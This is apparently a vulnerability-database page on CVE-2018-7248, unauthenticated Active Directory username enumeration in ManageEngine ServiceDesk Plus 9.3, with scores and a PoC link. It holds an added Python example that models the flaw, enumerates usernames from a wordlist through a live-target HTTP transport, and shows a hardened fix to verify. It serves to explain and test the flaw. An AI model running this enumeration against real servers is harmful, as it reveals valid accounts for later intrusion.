CVE-2018-7248

MEDIUM

Zoho ManageEngine ServiceDesk Plus 9.3 Build 9317 - Info Disclosure


Exploitation Summary

EIP tracks 1 public exploit for CVE-2018-7248. PoCs published by e-sterling.

AI-analyzed exploit summary: The repository contains a working Python script that exploits CVE-2018-7248, an unauthenticated information disclosure vulnerability in ManageEngine ServiceDesk Plus. The script enumerates Active Directory users by querying an exposed API endpoint that leaks each account's logon domain.

Description

An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3 Build 9317. Unauthenticated users can confirm whether a domain user account exists by sending a request containing the username to an API endpoint. The endpoint returns the user's logon domain if the account exists, or 'null' if it does not. Because the response differs for valid and invalid usernames, the endpoint acts as an account-enumeration oracle that needs no credentials.
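The following is an added example (not the page's own code and not the e-sterling PoC) that models the oracle described above: a lookup that returns the logon domain for a known account and the literal 'null' otherwise, the enumeration loop that abuses it, and a hardened variant that refuses unauthenticated callers. The sample user directory is constructed for the demonstration; the real endpoint path, HTTP method and parameter name are not given on this page, so the live-target transport takes them as caller-supplied assumptions.

```python
import json
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, Optional

# A transport maps a candidate username to the raw HTTP response body.
Transport = Callable[[str], str]

# Constructed sample directory standing in for the AD-backed user store.
SAMPLE_DIRECTORY: Dict[str, str] = {
    "jsmith": "CORP",
    "administrator": "CORP",
    "svc-backup": "LAB",
}


def vulnerable_lookup(username: str) -> str:
    """Models the reported behaviour: the logon domain comes back when the
    account exists, the literal 'null' when it does not, and there is no
    authentication check at all."""
    domain = SAMPLE_DIRECTORY.get(username)
    return json.dumps(domain) if domain is not None else "null"


def hardened_lookup(username: str, authenticated: bool = False) -> str:
    """Fix pattern (illustrative, not the vendor's patch): unauthenticated
    callers get one constant response regardless of the username, so the
    response no longer distinguishes valid from invalid accounts."""
    if not authenticated:
        return json.dumps({"error": "authentication required"})
    domain = SAMPLE_DIRECTORY.get(username)
    return json.dumps(domain) if domain is not None else "null"


def classify(body: str) -> Optional[str]:
    """Apply the oracle to one response body.

    'null', an empty body or JSON null means no such account; a non-empty
    JSON string is taken as the logon domain; anything else (an error
    object, non-JSON text) is not an answer and yields None."""
    text = body.strip()
    if text in ("", "null"):
        return None
    try:
        value = json.loads(text)
    except json.JSONDecodeError:
        return None
    return value if isinstance(value, str) and value else None


def enumerate_users(candidates: Iterable[str], transport: Transport) -> Dict[str, str]:
    """Query each candidate once and keep those the oracle confirms,
    mapping username -> leaked logon domain."""
    found: Dict[str, str] = {}
    for name in candidates:
        domain = classify(transport(name))
        if domain is not None:
            found[name] = domain
    return found


def http_transport(base_url: str, path: str, param: str, timeout: float = 10.0) -> Transport:
    """Transport for a live target. The endpoint path, GET method and query
    parameter name are assumptions: this page does not state them, so take
    them from the PoC you are reproducing."""
    def send(username: str) -> str:
        query = urllib.parse.urlencode({param: username})
        url = f"{base_url.rstrip('/')}{path}?{query}"
        req = urllib.request.Request(url, headers={"User-Agent": "cve-2018-7248-check"})
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    return send


if __name__ == "__main__":
    # Constructed wordlist; two of the five names do not exist in the directory.
    wordlist = ["jsmith", "bob", "administrator", "svc-backup", "guest"]
    print("vulnerable:", enumerate_users(wordlist, vulnerable_lookup))
    print("hardened  :", enumerate_users(wordlist, hardened_lookup))
```

Against the vulnerable lookup the loop recovers every existing account together with its domain; against the hardened lookup it recovers nothing, which is the property to verify after patching: the unauthenticated response must be identical for a username you know exists and one you know does not.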

Exploits (1)

GitLab · working PoC · 1 star
by e-sterling · PoC
https://gitlab.com/e-sterling/cve-2018-7248


Classification: Working PoC (95% confidence)
Attack Type: Info Leak
Complexity: Trivial
Reliability: Reliable
Target: ManageEngine ServiceDesk Plus
Authentication: none needed
Prerequisites: Network access to the target ManageEngine ServiceDesk Plus server
Analyzed by devstral-2 on Feb 23, 2026

References (3)

Third Party Advisory, VDB Entry (SecurityFocus BID 104287)
http://www.securityfocus.com/bid/104287
Exploit, Third Party Advisory
https://gitlab.com/e-sterling/cve-2018-7248

Scores

CVSS v3.1 base score: 5.3 (Medium)
EPSS: 0.0643 (6.43%)
EPSS Percentile: 92.8%
Attack Vector: NETWORK
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Details

Status published
Products (1)
zohocorp/manageengine_servicedesk_plus 9.3 (Build 9317)
Published May 11, 2018
Tracked Since Feb 18, 2026